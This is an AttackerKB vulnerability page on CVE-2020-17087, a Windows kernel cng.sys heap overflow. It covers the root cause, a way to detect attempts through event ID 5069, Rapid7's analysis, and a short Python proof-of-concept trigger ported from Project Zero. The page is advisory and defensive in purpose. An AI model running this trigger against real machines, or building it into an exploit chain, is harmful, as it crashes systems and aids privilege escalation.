High
CVE-2020-17087 Windows Kernel local privilege escalation 0day
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
CVE-2020-17087 Windows Kernel local privilege escalation 0day
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
Windows Kernel Local Elevation of Privilege Vulnerability
Add Assessment
Ratings
-
Attacker ValueHigh
-
ExploitabilityMedium
Technical Analysis
An error exists within cng!CfgAdtpFormatPropertyBlock
where buffer is allocated from a value that is truncated to be 16-bits. The function then goes on and performs a binary to ASCII hex conversion, writing the ASCII hex characters to this buffer. While performing the conversion, the original buffer’s correct length is used causing the write to continue out of bounds.
The vector for this vulnerability is local. A malicious attacker would first have to have code execution on the target system from any context including that of a sandboxed application. From there they would open a handle to \\.\GLOBALROOT\Device\Cng
before issuing the 0x390400 IOCTL with a crafted input buffer. The crafted input buffer contains a size parameter as one of the fields that when set to 0x2aab or greater will trigger the overflow.
Exploitation of this bug won’t be easy due to it being a heap based memory corruption within the kernel’s NonPagedPool. The attacker has partial control over the size of the allocation as constrained by ((size * 6) & 0xffff)
.
This vulnerability was originally reported by Google’s Project Zero who also reported that it is being actively exploited in the wild. The original report is on their tracker. The live in the wild exploitation is reportedly targeted and not related to the US elections. A patch is expected to be release on November 10th, 2020.
While the vulnerable code appears to be present within Windows 7 SP1 x64 as verified through static analysis. The original PoC provided by Google’s Project Zero team, does not trigger the bug on this platform. Within the callstack the chain is accessible, however a difference within the implementations is causing cng!BCryptSetContextFunctionProperty
to branch leading to the path to cng!CfgAdtReportFunctionPropertyModification
being missed.
Detection
Attempted exploitation of this vulnerability can be detected through auditing event ID 5069. This must be configured in order to detect exploitation attempts. To enable it, start secpol.msc
, then navigate to Security Settings > Advanced Audit Policy Configuration > System Audit Policies > Policy Change
. Set Audit Other Policy Change Events
to enable both “Success” and “Failure”. With this change in place, event ID 5069 will be loaded to the standard Windows Security Log that is accessible through the event viewer.
Exploitation attempts can then be identified through the length of the reported “value” field.
Proof of Concept
The following is a port of the original Proof of Concept released by Google Project Zero into Python and updated to demonstrate the vulnerability on both Windows 7 SP1 and Windows 10.
import ctypes import random # https://github.com/zeroSteiner/mayhem from mayhem.windll import * value = (ctypes.c_ubyte * 0x2aab)() bcrypt.BCryptSetContextFunctionProperty( bcrypt.CRYPT_LOCAL, 'Default', bcrypt.BCryptInterface.Cipher, 'AES', "XXX_{:08x}".format(random.randint(0, 0xffffffff)), len(value), value )
Instead of directly issuing the IOCTL, this variant uses the bcrypt!BCryptSetContextFunctionProperty
function with the appropriate arguments. Randomizing the pszProperty
argument helps to ensure that the vulnerability is triggered exactly once each time the code is run.
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportRatings
-
Attacker ValueHigh
Technical Analysis
Actively exploited in the wild, interesting take here: https://www.secpod.com/blog/windows-zero-day-vulnerability-being-exploited-in-the-wild-cve-2020-17087/?utm_source=Windows%20Zero%20Day%20Nov%2003&utm_medium=email&utm_campaign=Windows%20Zero%20Day%20November%2003
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportCVSS V3 Severity and Metrics
General Information
Vendors
- microsoft
Products
- windows 10 -,
- windows 10 1607,
- windows 10 1803,
- windows 10 1809,
- windows 10 1903,
- windows 10 1909,
- windows 10 2004,
- windows 10 20h2,
- windows 7 -,
- windows 8.1 -,
- windows rt 8.1 -,
- windows server 2008 -,
- windows server 2008 r2,
- windows server 2012 -,
- windows server 2012 r2,
- windows server 2016 -,
- windows server 2016 1903,
- windows server 2016 1909,
- windows server 2016 2004,
- windows server 2016 20h2,
- windows server 2019 -
Exploited in the Wild
Would you like to delete this Exploited in the Wild Report?
Yes, delete this report- Government or Industry Alert (https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
- News Article or Blog (https://www.tenable.com/blog/cve-2020-15999-cve-2020-17087-google-chrome-microsoft-windows-kernel-zero-day-vulnerabilities-exploited-in-wild-along-with-cve-2020-16009)
- Other: Google EITW Root Cause Analysis (https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-17087.html)
Would you like to delete this Exploited in the Wild Report?
Yes, delete this reportReferences
Additional Info
Technical Analysis
Update: CVE-2020-17087 was patched on November 10, 2020, as part of Microsoft’s November Patch Tuesday release.
Description
On October 30, 2020, Google’s Project Zero team publicly disclosed CVE-2020-17087, a zero-day vulnerability in the Windows Kernel Cryptography Driver (cng.sys). The vulnerability arises from input/output controller (IOCTL) 0x390400 processing and could allow a local attacker to escalate privileges, including for sandbox escape. The vulnerability is unpatched as of October 30—a patch is currently expected on November 10, 2020 as part of Microsoft’s November Patch Tuesday release.
Project Zero researchers said in their disclosure that Google has seen evidence of the zero day’s being used in targeted attacks in the wild. Project Zero lead Ben Hawkes said on Twitter that CVE-2020-17087 was used in conjunction with CVE-2020-15999, another zero-day in Google Chrome, to form an exploit chain that allowed attackers to escape Chrome’s sandbox to execute code on the underlying (Windows) operating system.
Affected products
In their initial report on October 22, 2020, Mateusz Jurczyk and Sergei Glazunov of Project Zero said they’d verified that an up-to-date build of Windows 10 1903 (64-bit) was vulnerable, but that they believed that the vulnerability had been present since at least Windows 7.
Rapid7 analysis
An unpatched zero-day in the Windows kernel affecting a huge swath of Windows users and seeing in-the-wild exploitation is undoubtedly a concern. Both rich technical detail and PoC code are readily available to the public, including researchers and attackers looking to build exploit chains of their own. Rapid7 researchers were also able to easily reproduce the crash on Windows 10 (v1909 build 18362). However, as Metasploit research lead Spencer McIntyre points out in his assessment of CVE-2020-17087, the vulnerability’s value to attackers is high, but its exploitability is at least somewhat more limited than it might appear at first glance. Creating a full exploit chain would require a primitive (i.e., an info leak) to turn the crash into code execution.
It’s possible we’ll see PoC exploit code quickly that extends the Project Zero researchers’ work and enables broader-scale attacks than the targeted exploitation Google disclosed to Microsoft earlier this month. It’s also possible, however, that the difficulty of reliably exploiting heap corruption vulnerabilities will slow down at-scale attacker capabilities until Microsoft releases a patch.
References
Report as Emergent Threat Response
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Very well written thank you. There is a PoC published on github I have tried but have not seen it produce Event id 5069 with correct audit policy logging turned on. I’m going to try the poc (which I should have in the first place) you included in this post and verify.